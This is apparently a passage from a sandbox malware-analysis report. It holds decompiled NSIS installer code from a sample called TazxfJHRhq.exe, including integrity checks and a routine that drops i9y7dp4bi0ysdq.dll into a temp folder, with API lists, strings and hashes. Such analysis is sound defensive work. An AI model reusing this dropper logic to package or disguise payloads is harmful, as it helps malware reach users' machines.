                                                                          								 *0x4092ac = 0;
                                                                          								GetClassInfoA(0, _t82, 0x7a2720);
                                                                          								 *0x7a2744 = _t82;
                                                                          								 *0x4092ac = 0x32;
                                                                          								RegisterClassA(0x7a2720);
                                                                          							}
                                                                          							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
                                                                          							E00401410(5);
                                                                          							return _t42;
                                                                          						}
                                                                          						L22:
                                                                          						_t34 = 2;
                                                                          						return _t34;
                                                                          					} else {
                                                                          						_t75 =  *0x7a2f80;
                                                                          						 *0x7a2734 = _t28;
                                                                          						_v20 = 0x624e5f;
                                                                          						 *0x7a2724 = E00401000;
                                                                          						 *0x7a2730 =  *0x7a2f80;
                                                                          						 *0x7a2744 =  &_v20;
                                                                          						if(RegisterClassA(0x7a2720) == 0) {
                                                                          							L33:
                                                                          							__eflags = 0;
                                                                          							return 0;
                                                                          						}
                                                                          						_t12 =  &_v16; // 0x624e5f
                                                                          						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                          						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
                                                                          						goto L21;
                                                                          					}
                                                                          				} else {
                                                                          					_t75 =  *(_t80 + 0x48);
                                                                          					if(_t75 == 0) {
                                                                          						goto L16;
                                                                          					}
                                                                          					_t78 = 0x7a1f20;
                                                                          					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
                                                                          					_t61 =  *0x7a1f20; // 0x49
                                                                          					if(_t61 == 0) {
                                                                          						goto L16;
                                                                          					}
                                                                          					if(_t61 == 0x22) {
                                                                          						_t78 = 0x7a1f21;
                                                                          						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
                                                                          					}
                                                                          					_t63 = lstrlenA(_t78) + _t78 - 4;
                                                                          					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
                                                                          						L15:
                                                                          						E004059BF(_t84, E004054CC(_t78));
                                                                          						goto L16;
                                                                          					} else {
                                                                          						_t67 = GetFileAttributesA(_t78);
                                                                          						if(_t67 == 0xffffffff) {
                                                                          							L14:
                                                                          							E00405513(_t78);
                                                                          							goto L15;
                                                                          						}
                                                                          						_t96 = _t67 & 0x00000010;
                                                                          						if((_t67 & 0x00000010) != 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						goto L14;
                                                                          					}
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                            • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                            • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                            • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                          • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
                                                                          • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 00403607
                                                                          • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
                                                                          • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
                                                                          • LoadImageA.USER32 ref: 0040366E
                                                                          • RegisterClassA.USER32 ref: 004036B5
                                                                            • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
                                                                          • CreateWindowExA.USER32 ref: 00403706
                                                                          • ShowWindow.USER32(00000005,00000000), ref: 0040373C
                                                                          • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
                                                                          • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
                                                                          • GetClassInfoA.USER32 ref: 0040376E
                                                                          • GetClassInfoA.USER32 ref: 0040377D
                                                                          • RegisterClassA.USER32 ref: 0040378D
                                                                          • DialogBoxParamA.USER32 ref: 004037AC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: 'z$"C:\Users\user\Desktop\TazxfJHRhq.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
                                                                          • API String ID: 914957316-986458996
                                                                          • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                          • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
                                                                          • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                          • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 81%
                                                                          			E00402C37(void* __eflags, signed int _a4) {
                                                                          				struct HWND__* _v8;
                                                                          				long _v12;
                                                                          				long _v16;
                                                                          				void* _v20;
                                                                          				intOrPtr _v24;
                                                                          				long _v28;
                                                                          				intOrPtr _v32;
                                                                          				intOrPtr _v36;
                                                                          				intOrPtr _v40;
                                                                          				intOrPtr _v44;
                                                                          				signed int _v48;
                                                                          				long _t52;
                                                                          				signed int _t56;
                                                                          				void* _t62;
                                                                          				intOrPtr* _t66;
                                                                          				long _t67;
                                                                          				signed int _t73;
                                                                          				signed int _t78;
                                                                          				signed int _t79;
                                                                          				long _t84;
                                                                          				intOrPtr _t89;
                                                                          				void* _t91;
                                                                          				signed int _t92;
                                                                          				signed int _t93;
                                                                          				signed int _t94;
                                                                          				signed int _t95;
                                                                          				void* _t97;
                                                                          				signed int _t101;
                                                                          				void* _t102;
                                                                          
                                                                          				_v8 = 0;
                                                                          				_t52 = GetTickCount();
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_t100 = "C:\\Users\\hardz\\Desktop";
                                                                          				_t97 = _t52 + 0x3e8;
                                                                          				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\hardz\\Desktop", 0x400);
                                                                          				_t91 = E00405690(_t100, 0x80000000, 3);
                                                                          				_v20 = _t91;
                                                                          				 *0x409020 = _t91;
                                                                          				if(_t91 == 0xffffffff) {
                                                                          					return "Error launching installer";
                                                                          				}
                                                                          				E00405513(_t100);
                                                                          				_t56 = GetFileSize(_t91, 0);
                                                                          				__eflags = _t56;
                                                                          				 *0x79d938 = _t56;
                                                                          				_t101 = _t56;
                                                                          				if(_t56 <= 0) {
                                                                          					L27:
                                                                          					__eflags =  *0x7a2f8c;
                                                                          					if( *0x7a2f8c == 0) {
                                                                          						goto L33;
                                                                          					}
                                                                          					__eflags = _v12;
                                                                          					if(_v12 == 0) {
                                                                          						L31:
                                                                          						_t102 = GlobalAlloc(0x40, _v28);
                                                                          						E004030FF( *0x7a2f8c + 0x1c);
                                                                          						_push(_v28);
                                                                          						_push(_t102);
                                                                          						_push(0);
                                                                          						_push(0xffffffff);
                                                                          						_t62 = E00402EBD();
                                                                          						__eflags = _t62 - _v28;
                                                                          						if(_t62 == _v28) {
                                                                          							__eflags = _a4 & 0x00000002;
                                                                          							 *0x7a2f88 = _t102;
                                                                          							if((_a4 & 0x00000002) != 0) {
                                                                          								 *_t102 =  *_t102 | 0x00000008;
                                                                          								__eflags =  *_t102;
                                                                          							}
                                                                          							__eflags = _v48 & 0x00000001;
                                                                          							 *0x7a3020 =  *_t102 & 0x00000018;
                                                                          							 *0x7a2f90 =  *_t102;
                                                                          							if((_v48 & 0x00000001) != 0) {
                                                                          								 *0x7a2f94 =  *0x7a2f94 + 1;
                                                                          								__eflags =  *0x7a2f94;
                                                                          							}
                                                                          							_t49 = _t102 + 0x44; // 0x44
                                                                          							_t66 = _t49;
                                                                          							_t93 = 8;
                                                                          							do {
                                                                          								_t66 = _t66 - 8;
                                                                          								 *_t66 =  *_t66 + _t102;
                                                                          								_t93 = _t93 - 1;
                                                                          								__eflags = _t93;
                                                                          							} while (_t93 != 0);
                                                                          							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
                                                                          							 *(_t102 + 0x3c) = _t67;
                                                                          							E00405670(0x7a2fa0, _t102 + 4, 0x40);
                                                                          							__eflags = 0;
                                                                          							return 0;
                                                                          						}
                                                                          						GlobalFree(_t102);
                                                                          						goto L33;
                                                                          					}
                                                                          					E004030FF( *0x789930);
                                                                          					_t73 = E004030CD( &_v12, 4); // executed
                                                                          					__eflags = _t73;
                                                                          					if(_t73 == 0) {
                                                                          						goto L33;
                                                                          					}
                                                                          					__eflags = _v16 - _v12;
                                                                          					if(_v16 != _v12) {
                                                                          						goto L33;
                                                                          					}
                                                                          					goto L31;
                                                                          				} else {
                                                                          					do {
                                                                          						_t92 = _t101;
                                                                          						asm("sbb eax, eax");
                                                                          						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
                                                                          						__eflags = _t101 - _t78;
                                                                          						if(_t101 >= _t78) {
                                                                          							_t92 = _t78;
                                                                          						}
                                                                          						_t79 = E004030CD(0x795938, _t92); // executed
                                                                          						__eflags = _t79;
                                                                          						if(_t79 == 0) {
                                                                          							__eflags = _v8;
                                                                          							if(_v8 != 0) {
                                                                          								DestroyWindow(_v8);
                                                                          							}
                                                                          							L33:
                                                                          							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
                                                                          						}
                                                                          						__eflags =  *0x7a2f8c;
                                                                          						if( *0x7a2f8c != 0) {
                                                                          							__eflags = _a4 & 0x00000002;
                                                                          							if((_a4 & 0x00000002) == 0) {
                                                                          								__eflags = _v8;
                                                                          								if(_v8 == 0) {
                                                                          									_t84 = GetTickCount();
                                                                          									__eflags = _t84 - _t97;
                                                                          									if(_t84 > _t97) {
                                                                          										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
                                                                          									}
                                                                          								} else {
                                                                          									E00405CFC(0);
                                                                          								}
                                                                          							}
                                                                          							goto L22;
                                                                          						}
                                                                          						E00405670( &_v48, 0x795938, 0x1c);
                                                                          						_t94 = _v48;
                                                                          						__eflags = _t94 & 0xfffffff0;
                                                                          						if((_t94 & 0xfffffff0) != 0) {
                                                                          							goto L22;
                                                                          						}
                                                                          						__eflags = _v44 - 0xdeadbeef;
                                                                          						if(_v44 != 0xdeadbeef) {
                                                                          							goto L22;
                                                                          						}
                                                                          						__eflags = _v32 - 0x74736e49;
                                                                          						if(_v32 != 0x74736e49) {
                                                                          							goto L22;
                                                                          						}
                                                                          						__eflags = _v36 - 0x74666f73;
                                                                          						if(_v36 != 0x74666f73) {
                                                                          							goto L22;
                                                                          						}
                                                                          						__eflags = _v40 - 0x6c6c754e;
                                                                          						if(_v40 != 0x6c6c754e) {
                                                                          							goto L22;
                                                                          						}
                                                                          						_t89 = _v24;
                                                                          						__eflags = _t89 - _t101;
                                                                          						if(_t89 > _t101) {
                                                                          							goto L33;
                                                                          						}
                                                                          						_a4 = _a4 | _t94;
                                                                          						_t95 =  *0x789930; // 0x328ac
                                                                          						__eflags = _a4 & 0x00000008;
                                                                          						 *0x7a2f8c = _t95;
                                                                          						if((_a4 & 0x00000008) != 0) {
                                                                          							L15:
                                                                          							_v12 = _v12 + 1;
                                                                          							_t24 = _t89 - 4; // 0x1c
                                                                          							_t101 = _t24;
                                                                          							__eflags = _t92 - _t101;
                                                                          							if(_t92 > _t101) {
                                                                          								_t92 = _t101;
                                                                          							}
                                                                          							goto L22;
                                                                          						}
                                                                          						__eflags = _a4 & 0x00000004;
                                                                          						if((_a4 & 0x00000004) != 0) {
                                                                          							break;
                                                                          						}
                                                                          						goto L15;
                                                                          						L22:
                                                                          						__eflags = _t101 -  *0x79d938; // 0x328b0
                                                                          						if(__eflags < 0) {
                                                                          							_v16 = E00405D2F(_v16, 0x795938, _t92);
                                                                          						}
                                                                          						 *0x789930 =  *0x789930 + _t92;
                                                                          						_t101 = _t101 - _t92;
                                                                          						__eflags = _t101;
                                                                          					} while (_t101 > 0);
                                                                          					__eflags = _v8;
                                                                          					if(_v8 != 0) {
                                                                          						DestroyWindow(_v8);
                                                                          					}
                                                                          					goto L27;
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402C45
                                                                          • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
                                                                            • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                            • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                          • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
                                                                          • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
                                                                          Strings
                                                                          • "C:\Users\user\Desktop\TazxfJHRhq.exe" , xrefs: 00402C41
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                                                          • Error launching installer, xrefs: 00402C8D
                                                                          • soft, xrefs: 00402D26
                                                                          • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
                                                                          • Null, xrefs: 00402D2F
                                                                          • Inst, xrefs: 00402D19
                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
                                                                          • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
                                                                          • verifying installer: %d%%, xrefs: 00402D89
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                                          • String ID: "C:\Users\user\Desktop\TazxfJHRhq.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                                          • API String ID: 2181728824-1728303477
                                                                          • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                          • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
                                                                          • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                          • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 57%
                                                                          			E0040179D(FILETIME* __ebx, void* __eflags) {
                                                                          				void* _t33;
                                                                          				void* _t41;
                                                                          				void* _t43;
                                                                          				long _t49;
                                                                          				long _t62;
                                                                          				signed char _t63;
                                                                          				long _t64;
                                                                          				void* _t66;
                                                                          				long _t72;
                                                                          				FILETIME* _t73;
                                                                          				FILETIME* _t77;
                                                                          				signed int _t79;
                                                                          				void* _t82;
                                                                          				CHAR* _t84;
                                                                          				void* _t87;
                                                                          
                                                                          				_t77 = __ebx;
                                                                          				_t84 = E00402A9A(0x31);
                                                                          				 *(_t87 - 0x34) = _t84;
                                                                          				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
                                                                          				_t33 = E00405538(_t84);
                                                                          				_push(_t84);
                                                                          				if(_t33 == 0) {
                                                                          					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                                                                          				} else {
                                                                          					_push(0x409c18);
                                                                          					E004059BF();
                                                                          				}
                                                                          				E00405BFB(0x409c18);
                                                                          				while(1) {
                                                                          					__eflags =  *(_t87 + 8) - 3;
                                                                          					if( *(_t87 + 8) >= 3) {
                                                                          						_t66 = E00405C94(0x409c18);
                                                                          						_t79 = 0;
                                                                          						__eflags = _t66 - _t77;
                                                                          						if(_t66 != _t77) {
                                                                          							_t73 = _t66 + 0x14;
                                                                          							__eflags = _t73;
                                                                          							_t79 = CompareFileTime(_t73, _t87 - 0x18);
                                                                          						}
                                                                          						asm("sbb eax, eax");
                                                                          						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                          						__eflags = _t72;
                                                                          						 *(_t87 + 8) = _t72;
                                                                          					}
                                                                          					__eflags =  *(_t87 + 8) - _t77;
                                                                          					if( *(_t87 + 8) == _t77) {
                                                                          						_t63 = GetFileAttributesA(0x409c18); // executed
                                                                          						_t64 = _t63 & 0x000000fe;
                                                                          						__eflags = _t64;
                                                                          						SetFileAttributesA(0x409c18, _t64); // executed
                                                                          					}
                                                                          					__eflags =  *(_t87 + 8) - 1;
                                                                          					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
                                                                          					__eflags = _t41 - 0xffffffff;
                                                                          					 *(_t87 - 8) = _t41;
                                                                          					if(_t41 != 0xffffffff) {
                                                                          						break;
                                                                          					}
                                                                          					__eflags =  *(_t87 + 8) - _t77;
                                                                          					if( *(_t87 + 8) != _t77) {
                                                                          						E00404D62(0xffffffe2,  *(_t87 - 0x34));
                                                                          						__eflags =  *(_t87 + 8) - 2;
                                                                          						if(__eflags == 0) {
                                                                          							 *((intOrPtr*)(_t87 - 4)) = 1;
                                                                          						}
                                                                          						L31:
                                                                          						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
                                                                          						__eflags =  *0x7a3008;
                                                                          						goto L32;
                                                                          					} else {
                                                                          						E004059BF(0x40a418, 0x7a4000);
                                                                          						E004059BF(0x7a4000, 0x409c18);
                                                                          						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\hardz\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll",  *((intOrPtr*)(_t87 - 0x10)));
                                                                          						E004059BF(0x7a4000, 0x40a418);
                                                                          						_t62 = E004052BF("C:\Users\hardz\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll",  *(_t87 - 0x24) >> 3) - 4;
                                                                          						__eflags = _t62;
                                                                          						if(_t62 == 0) {
                                                                          							continue;
                                                                          						} else {
                                                                          							__eflags = _t62 == 1;
                                                                          							if(_t62 == 1) {
                                                                          								 *0x7a3008 =  *0x7a3008 + 1;
                                                                          								L32:
                                                                          								_t49 = 0;
                                                                          								__eflags = 0;
                                                                          							} else {
                                                                          								_push(0x409c18);
                                                                          								_push(0xfffffffa);
                                                                          								E00404D62();
                                                                          								L29:
                                                                          								_t49 = 0x7fffffff;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					L33:
                                                                          					return _t49;
                                                                          				}
                                                                          				E00404D62(0xffffffea,  *(_t87 - 0x34));
                                                                          				 *0x4092a0 =  *0x4092a0 + 1;
                                                                          				_push(_t77);
                                                                          				_push(_t77);
                                                                          				_push( *(_t87 - 8));
                                                                          				_push( *((intOrPtr*)(_t87 - 0x1c)));
                                                                          				_t43 = E00402EBD(); // executed
                                                                          				 *0x4092a0 =  *0x4092a0 - 1;
                                                                          				__eflags =  *(_t87 - 0x18) - 0xffffffff;
                                                                          				_t82 = _t43;
                                                                          				if( *(_t87 - 0x18) != 0xffffffff) {
                                                                          					L22:
                                                                          					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
                                                                          				} else {
                                                                          					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
                                                                          					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
                                                                          						goto L22;
                                                                          					}
                                                                          				}
                                                                          				FindCloseChangeNotification( *(_t87 - 8)); // executed
                                                                          				__eflags = _t82 - _t77;
                                                                          				if(_t82 >= _t77) {
                                                                          					goto L31;
                                                                          				} else {
                                                                          					__eflags = _t82 - 0xfffffffe;
                                                                          					if(_t82 != 0xfffffffe) {
                                                                          						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
                                                                          					} else {
                                                                          						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
                                                                          						lstrcatA(0x409c18,  *(_t87 - 0x34));
                                                                          					}
                                                                          					_push(0x200010);
                                                                          					_push(0x409c18);
                                                                          					E004052BF();
                                                                          					goto L29;
                                                                          				}
                                                                          				goto L33;
                                                                          			}

                                                                          APIs
                                                                          • lstrcatA.KERNEL32(00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
                                                                          • CompareFileTime.KERNEL32(-00000014,?,Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
                                                                          • GetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
                                                                          • SetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,00000000), ref: 00401833
                                                                            • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                            • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                            • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
                                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll$Ivlfdpdlcleoxmzl
                                                                          • API String ID: 1152937526-2893049330
                                                                          • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                          • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
                                                                          • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                          • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 95%
                                                                          			// Decompiled routine from the NSIS installer stub. Its structure matches the NSIS
                                                                          			// source routine _dodecomp() in fileform.c, which copies one entry of the installer's
                                                                          			// data block either to an open file handle or to a memory buffer. The helper names in
                                                                          			// the comments (ReadSelfFile, inflate, update_status_text) are inferred from that
                                                                          			// correspondence; they are not symbols recovered from the binary.
                                                                          			//   _a4  : offset of the entry inside the data block (negative = continue at current position)
                                                                          			//   _a8  : destination file handle, used when _a12 == 0
                                                                          			//   _a12 : destination memory buffer (0 = write to the file instead)
                                                                          			//   _a16 : size of that buffer; overwritten below with the entry's 4-byte length header
                                                                          			//   _a19 : top byte of that header once it has been read (bit 7 = entry is compressed)
                                                                          			// Returns the number of bytes produced, or -2 (write failed), -3 (read failed), -4 (inflate failed).
                                                                          			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                                          				struct _OVERLAPPED* _v8;    // bytes produced so far (the return value)
                                                                          				long _v12;                  // output chunk size: caller's buffer length, or 0x8000 for the static buffer
                                                                          				void* _v16;                 // output pointer: caller's buffer, or the static 32 KiB output buffer
                                                                          				long _v20;                  // tick count of the last progress-text update
                                                                          				long _v24;                  // bytes written by WriteFile on the compressed path
                                                                          				intOrPtr _v28;              // last inflate() return code
                                                                          				char _v92;                  // "... %d%%" progress text
                                                                          				int* _t13;
                                                                          				int _t66;
                                                                          				void* _t68;
                                                                          				void* _t69;
                                                                          				int _t74;
                                                                          				long _t75;
                                                                          				intOrPtr _t79;
                                                                          				long _t80;
                                                                          				void* _t82;
                                                                          				int _t84;
